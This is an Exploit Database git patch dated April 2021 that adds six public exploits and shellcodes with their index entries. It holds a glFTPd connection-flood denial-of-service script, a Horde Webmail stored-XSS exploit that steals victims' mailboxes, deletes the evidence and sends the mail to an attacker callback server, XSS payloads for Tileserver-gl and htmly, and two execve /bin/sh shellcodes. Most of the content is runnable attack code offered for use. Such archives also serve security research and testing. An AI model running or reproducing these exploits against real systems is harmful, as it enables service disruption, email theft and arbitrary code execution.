From 53c15c17c6b551739d0fd70384b9aa3348e700fc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 16 Apr 2021 05:02:00 +0000 Subject: [PATCH] DB: 2021-04-16 6 changes to exploits/shellcodes glFTPd 2.11a - Remote Denial of Service Horde Groupware Webmail 5.2.22 - Stored XSS Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS) htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) --- exploits/multiple/dos/49773.py | 101 ++++++++++ exploits/multiple/webapps/49769.py | 283 ++++++++++++++++++++++++++++ exploits/multiple/webapps/49771.txt | 10 + exploits/multiple/webapps/49772.py | 58 ++++++ files_exploits.csv | 4 + files_shellcodes.csv | 2 + shellcodes/linux_x86-64/49770.c | 46 +++++ shellcodes/linux_x86/49768.c | 30 +++ 8 files changed, 534 insertions(+) create mode 100755 exploits/multiple/dos/49773.py create mode 100755 exploits/multiple/webapps/49769.py create mode 100644 exploits/multiple/webapps/49771.txt create mode 100755 exploits/multiple/webapps/49772.py create mode 100644 shellcodes/linux_x86-64/49770.c create mode 100644 shellcodes/linux_x86/49768.c diff --git a/exploits/multiple/dos/49773.py b/exploits/multiple/dos/49773.py new file mode 100755 index 000000000..fdc7cafbe --- /dev/null +++ b/exploits/multiple/dos/49773.py @@ -0,0 +1,101 @@ +# Exploit Title: glFTPd 2.11a - Remote Denial of Service +# Date: 15/05/2021 +# Exploit Author: xynmaps +# Vendor Homepage: https://glftpd.io/ +# Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz +# Version: 2.11a +# Tested on: Parrot Security OS 5.9.0 + +#-------------------------------# + +#encoding=utf8 +#__author__ = XYN/Dump/NSKB3 +#glFTPd Denial of Service exploit by XYN/Dump/NSKB3. +""" +glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, +you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. +(if it's limited, just run this script from different proxies using proxychains, and it will work) +""" + +import socket +import sys +import threading +import subprocess +import time + +banner = """ +._________________. +| glFTPd | +| D o S | +|_________________| +|By XYN/DUMP/NSKB3| +|_|_____________|_| +|_|_|_|_____|_|_|_| +|_|_|_|_|_|_|_|_|_| + +""" +usage = "{} ".format(sys.argv[0]) + +def test(t,p): + s = socket.socket() + s.settimeout(10) + try: + s.connect((t, p)) + response = s.recv(65535) + s.close() + return 0 + except socket.error: + print("Port {} is not open, please specify a port that is open.".format(p)) + sys.exit() +def attack(targ, po, id): + try: + subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + #print("Worker {} running".format(id)) + except OSError: pass +def main(): + global target, port, start + print banner + try: + target = sys.argv[1] + except: + print usage + sys.exit() + try: + port = int(sys.argv[2]) + except: + port = 21 + try: + conns = int(sys.argv[3]) + except: + conns = 50 + print("[!] Testing if {0}:{1} is open".format(target, port)) + test(target, port) + print("[+] Port {} open, starting attack...".format(port)) + time.sleep(2) + print("[+] Attack started on {0}:{1}!".format(target, port)) + def loop(target, port, conns): + global start + threading.Thread(target=timer).start() + while 1: + for i in range(1, conns + 3): + t = threading.Thread(target=attack, args=(target,port,i,)) + t.start() + if i > conns + 2: + t.join() + break + loop() + + t = threading.Thread(target=loop, args=(target, port, conns,)) + t.start() + +def timer(): + start = time.time() + while 1: + if start < time.time() + float(900): pass + else: + subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + t = threading.Thread(target=loop, args=(target, port,)) + t.start() + break + +main() \ No newline at end of file diff --git a/exploits/multiple/webapps/49769.py b/exploits/multiple/webapps/49769.py new file mode 100755 index 000000000..3aaeec7e0 --- /dev/null +++ b/exploits/multiple/webapps/49769.py @@ -0,0 +1,283 @@ +# Exploit Title: Horde Groupware Webmail 5.2.22 - Stored XSS +# Author: Alex Birnberg +# Testing and Debugging: Ventsislav Varbanovski @nu11secur1ty +# Date: 04.14.2021 +# Vendor: https://www.horde.org/apps/webmail +# Link: https://github.com/horde/webmail/releases +# CVE: CVE-2021-26929 + +[+] Exploit Source: +https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26929 + +[Exploit Program Code] + +#!/usr/bin/python3 +# Author idea: Alex Birnberg +# debug nu11secur1ty 2021 +import io +import os +import ssl +import sys +import json +import base64 +import string +import random +import logging +import smtplib +import sqlite3 +import hashlib +import zipfile +import argparse +from flask import Flask, request, Response +from urllib.parse import urlparse + +class Exploit: + def __init__(self, args): + # Database + if not os.path.exists('database.db'): + with sqlite3.connect("database.db") as conn: + cursor = conn.cursor() + cursor.execute('CREATE TABLE mailbox (hash TEXT NOT NULL UNIQUE, content BLOB NOT NULL);') + conn.commit() + # SMTP URL + o = urlparse(args.smtp) + self.smtp = { + 'ssl': o.scheme.lower() == 'smtps', + 'host': o.hostname or '127.0.0.1', + 'port': o.port or ('465' if o.scheme.lower() == 'smtps' else '25'), + 'username': '' or o.username, + 'password': '' or o.password + } + try: + if self.smtp['ssl']: + context = ssl.create_default_context() + context.verify_mode = ssl.CERT_OPTIONAL + context.check_hostname = False + self.server = smtplib.SMTP_SSL(self.smtp['host'], self.smtp['port'], context=context) + else: + self.server = smtplib.SMTP(self.smtp['host'], self.smtp['port']) + except Exception as e: + print(e) + print('[-] Error connecting to SMTP server!') + exit() + try: + self.server.login(self.smtp['username'], self.smtp['password']) + except: + pass + # Callback URL + o = urlparse(args.callback) + self.callback = { + 'url': '{}://{}'.format(o.scheme, o.netloc), + 'path': ''.join(random.choice(string.ascii_letters) for i in range(20)) + } + # Listener URL + o = urlparse(args.listener) + self.listener = { + 'ssl': o.scheme.lower() == 'https', + 'host': o.hostname or '0.0.0.0', + 'port': o.port or 80, + 'horde': ''.join(random.choice(string.ascii_letters) for i in range(20)) + } + # Target email + self.target = args.target + # Subject + self.subject = args.subject or 'Important Message' + # Environment + self.env = {} + self.env['mailbox'] = args.mailbox or 'INBOX' + self.env['callback'] = '{}/{}'.format(self.callback['url'], self.callback['path']) + + def trigger(self): + print('[*] Waiting for emails...') + self.bypass_auth() + print('\n[*] Done') + + def bypass_auth(self): + def horde(): + f = open('horde.js') + content = 'env = {};\n\n{}'.format(json.dumps(self.env), f.read()) + f.close() + return content + + def callback(): + response = Response('') + with sqlite3.connect("database.db") as conn: + try: + if request.files.get('mbox'): + filename = request.files.get('mbox').filename.replace('zip', 'mbox') + content = request.files.get('mbox').stream.read() + zipdata = io.BytesIO() + zipdata.write(content) + content = zipfile.ZipFile(zipdata) + content = content.open(filename).read() + mail_hash = hashlib.sha1(content).digest().hex() + print('[+] Received mailbox ({})'.format(mail_hash)) + cursor = conn.cursor() + cursor.execute('INSERT INTO mailbox (hash, content) VALUES (?, ?)', (mail_hash, content)) + except: + pass + response.headers['Access-Control-Allow-Origin'] = '*' + return response + + payload = 'var s=document.createElement("script");s.type="text/javascript";s.src="{}/{}";document.head.append(s);'.format(self.callback['url'], self.listener['horde']) + payload = ''.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1')) + content = 'Subject: {}\nFrom: {}\nTo: {}\n'.format(self.subject, self.smtp['username'], self.target) + # The secret services :) + content += 'X\x00\x00\x00{}\x00\x00\x00X'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1')) + self.server.sendmail(self.smtp['username'], self.target, content) + app = Flask(__name__) + app.add_url_rule('/{}'.format(self.listener['horde']), 'horde', horde) + app.add_url_rule('/{}'.format(self.callback['path']), 'callback', callback, methods=['POST']) + logging.getLogger('werkzeug').setLevel(logging.ERROR) + cli = sys.modules['flask.cli'] + cli.show_server_banner = lambda *x: None + try: + if self.listener['ssl']: + app.run(host=self.listener['host'], port=self.listener['port'], ssl_context=('cert.pem', 'key.pem')) + else: + app.run(host=self.listener['host'], port=self.listener['port']) + except: + pass + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument('--smtp', help='SMTP URL', required=True, metavar='URL') + parser.add_argument('--callback', help='Callback URL', required=True, metavar='URL') + parser.add_argument('--listener', help='Listener URL', metavar='URL') + parser.add_argument('--target', help='Target email', required=True, metavar='EMAIL') + parser.add_argument('--subject', help='Email subject', metavar='SUBJECT') + parser.add_argument('--mailbox', help='Mailbox from which to steal the emails', metavar='INBOX') + args = parser.parse_args() + exploit = Exploit(args) + exploit.trigger() +horde.js + +class Exploit { + constructor() { + this.basepath = document.location.pathname.substring(0, document.location.pathname.indexOf('imp')); + } + + trigger() { + this.mailbox = this.get_mailbox(); + this.buid = this.get_buid(); + this.token = this.get_token(); + this.auto_delete() + .then(() => { + this.exfiltrate_emails({mailbox: env.mailbox}); + }); + } + + async auto_delete() { + let params = new URLSearchParams() + params.append('token', this.token); + params.append('view', this.mailbox); + params.append('buid', this.buid); + return fetch(this.basepath + 'services/ajax.php/imp/deleteMessages', { + method: 'POST', + body: params + }) + .then(() => { + let params = new URLSearchParams(); + params.append('token', this.token); + params.append('view', this.mailbox); + return fetch(this.basepath + 'services/ajax.php/imp/purgeDeleted', { + method: 'POST', + body: params + }) + .then(() => { + if (document.getElementById('checkmaillink') !== null) { + document.getElementById('checkmaillink').click(); + } + }); + }); + } + + async exfiltrate_emails(args) { + let mbox_list = '["' + this.get_mailbox() + '"]'; + if (args.mailbox.toUpperCase() != 'INBOX') { + let params = new URLSearchParams(); + params.append('reload', '1'); + params.append('unsub', '1'); + params.append('token', this.token); + let mailboxes = await fetch(this.basepath + 'services/ajax.php/imp/listMailboxes', { + method: 'POST', + body: params + }) + .then(response => { + return response.text(); + }) + .then(data => { + return JSON.parse(data.substring(10, data.length - 2)); + }); + mailboxes.tasks['imp:mailbox'].a.forEach(mailbox => { + if (mailbox.l.toUpperCase() == args.mailbox) { + if (mbox_list === undefined) { + mbox_list = '["' + mailbox.m + '"]'; + } + } + }); + } + let zip = await fetch(this.basepath + 'services/download/?app=imp&actionID=download_mbox&mbox_list=' + mbox_list + '&type=mboxzip&token=' + this.token + '&fn=/') + .then(response => { + return [response.blob(), response.headers.get('Content-Disposition')]; + }); + let filename = zip[1]; + filename = filename.substring(filename.indexOf('filename="') + 10, filename.length - 1); + zip = await zip[0]; + let formData = new FormData(); + formData.append('mbox', zip, filename); + fetch(window.env.callback, { + method: 'POST', + body: formData + }); + } + + get_token() { + let link; + let token; + if (document.getElementsByClassName('smartmobile-logout').length > 0) { + link = document.getElementsByClassName('smartmobile-logout')[0].href; + } + else if (document.getElementById('horde-logout') !== null) { + link = document.getElementById('horde-logout').getElementsByTagName('a')[0].href; + } + else { + link = location.href; + } + if (link.match('horde_logout_token=(.*)&') !== null) { + token = link.match('horde_logout_token=(.*)&')[1]; + } + if (token === undefined && link.match('token=(.*)&') !== null) { + token = link.match('token=(.*)&')[1]; + } + return token; + } + + get_mailbox() { + if (window.DimpBase !== undefined) { + return DimpBase.viewport.getSelection(DimpBase.pp.VP_view).search({ + VP_id: { + equal: [ DimpBase.pp.VP_id ] + } + }).get('dataob').first().VP_view; + } + else if (location.href.match('mailbox=([A-Za-z0-9]*)') !== null) { + return location.href.match('mailbox=([A-Za-z0-9]*)')[1]; + } + else if (location.href.match('mbox=([A-Za-z0-9]*)') !== null) { + return location.href.match('mbox=([A-Za-z0-9]*)')[1]; + } + } + + get_buid() { + if (location.href.match('buid=([0-9]*)') !== null) { + return location.href.match('buid=([0-9]*)')[1]; + } + else if (location.href.match(';([0-9]*)') !== null) { + return location.href.match(';([0-9]*)')[1]; + } + } +} + +const exploit = new Exploit(); +exploit.trigger(); \ No newline at end of file diff --git a/exploits/multiple/webapps/49771.txt b/exploits/multiple/webapps/49771.txt new file mode 100644 index 000000000..f6092e1bd --- /dev/null +++ b/exploits/multiple/webapps/49771.txt @@ -0,0 +1,10 @@ +# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS) +# Date: 15/04/2021 +# Exploit Author: Akash Chathoth +# Vendor Homepage: http://tileserver.org/ +# Software Link: https://github.com/maptiler/tileserver-gl +# Version: versions <3.1.0 +# Tested on: 2.6.0 +# CVE: 2020-15500 + +Exploit : http://example.com/?key="> \ No newline at end of file diff --git a/exploits/multiple/webapps/49772.py b/exploits/multiple/webapps/49772.py new file mode 100755 index 000000000..d02332c79 --- /dev/null +++ b/exploits/multiple/webapps/49772.py @@ -0,0 +1,58 @@ +# Exploit Title: htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS) +# Authors: @nu11secur1ty & G.Dzhankushev +# Date: 04.15.2021 +# Vendor Homepage: https://www.htmly.com/ +# Software Link: https://github.com/danpros/htmly +# CVE: CVE-2021-30637 + +#!/usr/bin/python3 + +from selenium import webdriver +from selenium.webdriver.common.by import By +from selenium.webdriver.support.ui import WebDriverWait +from selenium.webdriver.support import expected_conditions as EC +import time + + +#enter the link to the website you want to automate login. +website_link="http://localhost/htmly/login" + +#enter your login username +username="nu11secur1ty" + +#enter your login password +password="password" + +#enter the element for username input field +element_for_username="user" +#enter the element for password input field +element_for_password="password" +#enter the element for submit button +element_for_submit="submit" + + +#browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] +browser = webdriver.Chrome() #uncomment this line,for chrome users +#browser = webdriver.Firefox() #uncomment this line,for chrome users + +browser.get((website_link)) + +try: + username_element = browser.find_element_by_name(element_for_username) + username_element.send_keys(username) + password_element = browser.find_element_by_name(element_for_password) + password_element.send_keys(password) + signInButton = browser.find_element_by_name(element_for_submit) + signInButton.click() + + # Exploit .ini + browser.get(("http://localhost/htmly/admin/config")) + browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = ''") + time.sleep(3) + browser.execute_script("document.querySelector('.btn.btn-primary').click()") + + print("payload is deployed...\n") + +except Exception: + #### This exception occurs if the element are not found in the webpage. + print("Some error occured :(") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index eb010674b..6a073bfa0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6777,6 +6777,7 @@ id,file,description,date,author,type,platform,port 49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware, 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple, 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware, +49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -43944,3 +43945,6 @@ id,file,description,date,author,type,platform,port 49764,exploits/hardware/webapps/49764.txt,"Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE",2021-04-14,"Jay Sharma",webapps,hardware, 49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple, 49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple, +49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",2021-04-15,nu11secur1ty,webapps,multiple, +49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",2021-04-15,"Akash Chathoth",webapps,multiple, +49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 7bafdcd84..32307fc3b 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1032,3 +1032,5 @@ id,file,description,date,author,type,platform 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux 49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64 49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86 +49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",2021-04-15,s1ege,shellcode,linux_x86 +49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",2021-04-15,s1ege,shellcode,linux_x86-64 diff --git a/shellcodes/linux_x86-64/49770.c b/shellcodes/linux_x86-64/49770.c new file mode 100644 index 000000000..a366533b3 --- /dev/null +++ b/shellcodes/linux_x86-64/49770.c @@ -0,0 +1,46 @@ +# Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) +# Author: s1ege +# Tested on: x86_64 GNU/Linux +# Shellcode Length: 21 + +/* + +################################################ +objdump disassembly +################################################ +401000: 50 push %rax +401001: 48 31 d2 xor %rdx,%rdx +401004: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx +40100b: 2f 73 68 +40100e: 53 push %rbx +40100f: 54 push %rsp +401010: 5f pop %rdi +401011: b0 3b mov $0x3b,%al +401013: 0f 05 syscall +################################################ + +################################################ +shellcode.asm +################################################ +; nasm -felf64 shellcode.asm && ld shellcode.o -o shellcode +section .text +global _start +_start: +push rax +xor rdx, rdx +mov rbx, 0x68732f2f6e69622f +push rbx +push rsp +pop rdi +mov al, 59 +syscall +################################################ +*/ +unsigned char shellcode[] = \ +"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; + +int main() { +int (*ret)() = (int(*)())shellcode; +ret(); +return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/49768.c b/shellcodes/linux_x86/49768.c new file mode 100644 index 000000000..7ddc7df3c --- /dev/null +++ b/shellcodes/linux_x86/49768.c @@ -0,0 +1,30 @@ +# Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) +# Author: s1ege +# Tested on: i686 GNU/Linux +# Shellcode length: 17 + +/* +; nasm -felf32 shellcode.asm && ld -melf_i386 shellcode.o -o shellcode +section .text +global _start +_start: +push 0x0b +pop eax +push 0x0068732f +push 0x6e69622f +mov ebx, esp +int 0x80 +*/ + +#include +#include + +unsigned char code[] = \ +"\x6a\x0b\x58\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; + +int main() { +printf("Shellcode Length: %lu\n", sizeof(code)-1); // subtract null byte +int (*ret)() = (int(*)())code; +ret(); +return 0; +} \ No newline at end of file